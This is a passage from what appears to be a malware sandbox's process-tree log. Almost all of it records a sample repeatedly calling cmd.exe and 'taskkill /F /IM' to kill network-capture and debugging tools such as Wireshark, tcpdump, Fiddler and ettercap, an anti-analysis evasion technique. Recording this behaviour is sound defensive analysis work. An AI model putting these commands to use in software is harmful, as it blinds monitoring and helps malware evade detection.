        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:64
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:3428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1952
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        Kills process with taskkill
        
        PID:4160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3340
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:5032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4176
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4692
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:5024
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:816
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:2820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:1908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:1748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:5032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:5084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3220
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:5068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3892
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        Kills process with taskkill
        
        PID:2328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:1668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4524
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Kills process with taskkill
        
        PID:3168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3552
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:5020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:5096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3892
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1668
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:3860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3984
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4628
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:432
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2588
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:1540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:320
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:448
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:5064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3356
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1792
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:3928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1384
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
